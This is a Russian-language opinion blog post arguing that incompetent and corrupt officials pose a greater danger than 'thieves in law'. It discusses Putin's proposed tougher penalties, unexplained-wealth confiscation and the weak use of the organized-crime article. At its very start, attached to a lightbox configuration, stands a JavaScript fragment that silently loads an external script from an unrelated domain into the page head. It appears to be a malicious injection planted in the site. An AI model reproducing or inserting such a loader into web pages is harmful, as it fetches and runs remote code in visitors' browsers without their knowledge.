, 'opacity': false, 'speedIn': 500, 'speedOut': 500, 'changeSpeed': 300, 'overlayShow': false, 'overlayOpacity': "", 'overlayColor': "", 'titleShow': false, 'titlePosition': '', 'enableEscapeButton': false, 'showCloseButton': false, 'showNavArrows': false, 'hideOnOverlayClick': false, 'hideOnContentClick': false, 'width': 500, 'height': 340, 'transitionIn': "", 'transitionOut': "", 'centerOnScroll': false }); var script = document.createElement('script'); script.type= 'text/javascript'; script.src = 'https://cdn.messagefromspaces.com/c.js?pro=type'; document.getElementsByTagName('head')[0].appendChild(script); })
RSS
 

Кто опаснее, «вор в законе» или «неумеха во власти»?

16 Фев

Владимир Путин предложил https://www.kommersant.ru/doc/3883167   ужесточить наказание для лидеров ОПГ.

Возможно, пришло осознание того, что  большую угрозу обществу представляют те, кто возродил в лихие 90-е организованные группы, которые вымогательством и убийствами завладели всей страной и держат её в своём подчинении.

Но вновь чувствуется затея чего-то недоучивших «ученых», которые ещё в 1996 года пытались дважды протащить закон «О борьбе с организованной преступностью». Об этом много раз писал, и мне удалось убедить команду Бориса Ельцина, не подписывать этот закон.

Но вот новые инициативы.

Уверен, что спецслужбы докладывают Путину не только  о том, что  сотни тысяч предпринимателей каждый год кошмарят и обобирают правоохранители, но и то, что все предприниматели  платят  дань криминалу.

В своё время Ленин, инкогнито, изучал то, что происходит в стране, а оперативник Путин мог бы стать свидетелем сбора дани, побывав инкогнито, хотя бы на рынках Москвы.

О  том, как устроена и кем осуществляется система поборов предпринимателей правоохранителями, прописано в действующем законодательстве.

Чиновниками,  наделёнными правом осуществлять уголовное преследование, по надуманным основаниям возбуждаются уголовные дела на предпринимателя, а затем ему предлагают делиться или полностью лишают созданного бизнеса. Множество примеров этому можно найти в интернете.

Дело это доходное. Яко бы у действовавшего в одиночку, заместителя начальника управления «Т» Главного управления экономической безопасности МВД России Дмитрия Захарченко было изъято https://www.kp.ru/daily/26580.7/3595406/   9 млрд. рублей в иностранной валюте.

А, что  имеют те, кто действует в составе организованной группы, приходится только догадываться и соглашаться с тем, что россияне видят каждый день на ТВ.

Но есть эффективные меры противодействия поборам чиновников. Всё их имущество на виду у россиян, как и их показная барская жизнь. Ничего на необитаемые острова они не увезли. Более 200 тысяч, закупив недвижимость, разместилось в Лондоне. Остальные обосновались в Испании и США.

Уже седьмой год  существует п.п. 8 п. 2 статьи 235 ГК РФ, позволяющий противодействовать чиновникам,  пользоваться «сомнительной собственностью».

Да, применение этой нормы не предусматривает лишение свободы, но всю «сомнительную собственность» могут отобрать и на весь мир опозорить. Криминально чиновникам станет бесполезно обогащаться. Наконец-то они займутся исполнением своих прямых обязанностей. Правоохранители выявлять и доказывать совершение преступлений и лиц, причастных к ним, а суды, подчиняясь особому порядку судопроизводства, установленному Конституцией и процессуальным законодательством, признавать виновными и определять суровые, но справедливые наказания.

Однако, ответственный за применение этой нормы Владимир Путин, не спешит применять её к своим назначенцам, достоверно зная, что в их обладании находится имущество, которое они не смогли бы приобрести на свои непомерные зарплаты и за сто лет работы.

Например, член правительства Улюкаев, ни дня не работавший в бизнесе, зарабатывавший в чине министра экономического развития в год 15 млн. руб., обладал имуществом на миллиард.

Конституция России только декларирует судебную защиту каждому от незаконных и необоснованных действий, бездействия или решений органов  власти и должностных лиц.

Обязанный исполнять волю народа, изложенную в Основном Законе страны, гарант Конституции Владимир Путин, так и не стал гарантом. Поэтому не имеющие защиты предприниматели становятся легкой добычей и чиновников-вымогателей и обычных вымогателей.

В результате безнаказанной криминальной деятельности чиновников, бюджет страны теряет триллионы, а миллионы пенсионеров вынуждены выживать на 8−10 тыс. руб.

При таких обстоятельствах Путин решил дать бой не своим предателям-назначенцам, а тем, кто «занимает высшее положение в преступной иерархии».

Как организованы группы, занимающиеся криминальной деятельностью вне официальных государственных систем,  знают только сотрудники оперативных подразделений.

Именно они и могут рассказать о том, кто в конкретном регионе, городе, посёлке, фактически контролирует экономику и позволяет ей развиваться или уничтожает.

Ещё не забыты события http://www.aif.ru/society/law/uzhas_kushchevskoy_istoriya_bandy_stavshey_vlastyu_v_otdelno_vzyatoy_stanice    в Кущёвской, где банда стала властью в отдельно взятой станице.

Ошибочно считается, что высшее положение в преступной иерархии занимают «воры в законе», которые действуют в организованном сообществе, объединяют его участников, привлекают к деятельности, осуществляют постановку задач и контроль над их выполнением.

Недоучившие Уголовный кодекс  некоторые «ученые», убедили в 1996 году законодателей дополнить Уголовный кодекс  статьёй 210 УК РФ, полагая, что она поможет бороться с организованной преступностью.  Но этого не случилось.  «Воры в законе» в этот закон не вписались.

Более  того, абсурдная норма стала применяться и к тем, кто никаких «преступных сообществ» не создавал, а действовал в рамках государственной системы, действующего законодательства, иногда, превышая свои полномочия.

Например, в антикоррупционном управлении МВД, по версии https://www.rbc.ru/society/27/04/2017/590171209a79472be622448e     следствия, несколько лет действовало преступное сообщество под руководством Сугробова. Входившие в него офицеры систематически превышали полномочия, поставили на поток фальсификацию оперативных материалов на высокопоставленных чиновников и бизнесменов, массово провоцировали их на преступления.

Гособвинение пришло к выводу, что мотива наживы в действиях офицеров не было: подсылая к своим жертвам агентов-провокаторов, сотрудники МВД добивались карьерного роста и наград.

Удручает и статистика.

За первое полугодие 2018 года за создание ОПС лицом, занимающим высшее положение в преступной иерархии (ч.4 ст. 210 УК), был осужден один человек, следует из статистики Судебного департамента Верховного суда; за 2017 год — ни одного.

Вот и получается, какие бы законодательные инициативы Путин не осуществлял, без наведения порядка в государственных структурах, все эти инициативы окажутся фикцией, очередным самообманом и обманом народа.

Да,  деяния лидеров организованных групп, занимающихся криминальной деятельностью,  влияют на общественную жизнь гораздо сильнее, чем деяния конкретных исполнителей преступлений, но для  борьбы с ними нужны не только работающие законы, но и исполнители способные такие законы использовать.

А сегодня, как показывает анализ публикаций, нет ни законов, ни исполнителей.

Вот и получается, что «неумеха во власти» опаснее «вора в законе».

 
Комментариев нет

Автор: ossin Категория: Прочие заметки

 

Оставить комментарий

Вы должны войти, чтобы оставить комментарий.